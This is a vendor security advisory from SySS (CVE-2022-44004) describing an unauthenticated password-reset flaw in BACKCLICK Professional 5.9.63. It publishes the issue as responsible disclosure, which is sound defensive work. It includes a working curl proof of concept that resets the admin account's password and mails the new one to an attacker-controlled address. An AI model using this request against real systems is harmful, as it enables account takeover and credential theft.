-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-030 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: CWE-640: Weak Password Recovery Mechanism for Forgotten Password CWE-306: Missing Authentication for Critical Function Risk Level: High Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-44004 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see [1]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to insecure design or lack of authentication, unauthenticated attackers can complete the password reset process for any account and set a new password. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: One of the technologies used by the management web application is Direct Web Remoting (DWR) to provide AJAX-style web services. These services can also be accessed over the external web host and for the most part do not seem to require any authentication. One of the exposed functions is sendPasswordReminder which accepts both the target user ID (param0) and an arbitrary e-mail address (param1) to trigger a password reset. Invoking the function will change the target user's password (also a questionable process design, as it allows to lock out users) and send that to the specified address by e-mail. The attacker would then be able to log in to the management web interface - - this, however, may be restricted to the internal web host. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Invoking the web service via - ----- > curl -i -s -k -H $'Content-Type: text/plain' \ --data-binary $'callCount=1\x0ac0-scriptName=GUIAjax\x0a' \ 'c0-methodName=sendPasswordReminder\x0a' \ 'c0-id=1287_1647860875148\x0a' \ 'c0-param0=number:1\x0a' \ 'c0-param1=string:mail%40attacker.com\x0a' \ xml=true\x0a' \ $'https://externalhost/bc/dwr/exec/GUIAjax.sendPasswordReminder.dwr' - ----- will change the target user account's (user id 1 - bcadmin) password to a randomly generated one and send that to the specified e-mail address: - ----- Hallo bc admin, Ihrem Backclick-Benutzer-Account wurde ein temporäres Passwort zugewiesen. Bitte melden Sie sich mit dem temporären Passwort in Ihrer Backclick-Umgebung an. Sie werden anschließend dazu aufgefordert ein neues Passwort zu wählen. Login: bcadmin Passwort: Mandant: - ----- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for BACKCLICK https://www.backclick.de/ [2] SySS Security Advisory SYSS-2022-030 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-030.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT4ACgkQdo7+K7Pl Pdroxgf+KZasLjj9Gg8m4m2Sg9WkbxwoNxKoj1SZ3m8RVGB+KBflTrq7uXK3mGtO isXfDxP+/mjqQ99bt+jwGSAc/ZDwEMnR0c9zJWc5QtJm5u6OUQYmD1UsdChTel/H 6e/nt9a9CkS46TNNQKsmvY0rQsJaQzF4cHvoGK+PP2ZGRug0x+svHMbo4MWkduKm lB+KcAkw6WbCMB2cJYdgE+VPOI2kE/wHqRaL7i5PQoKbzWzInUVJrZbBwU4OTKux Zv4WVjajZ7O0z4rdtVNrO/bNJ0NDh11W70PA71mcyPqqm/6usKZ8rePU9UQki9MJ xxQ4r3NCizZUvK4hGxuVRxO9c/OZ3Q== =VDQR -----END PGP SIGNATURE-----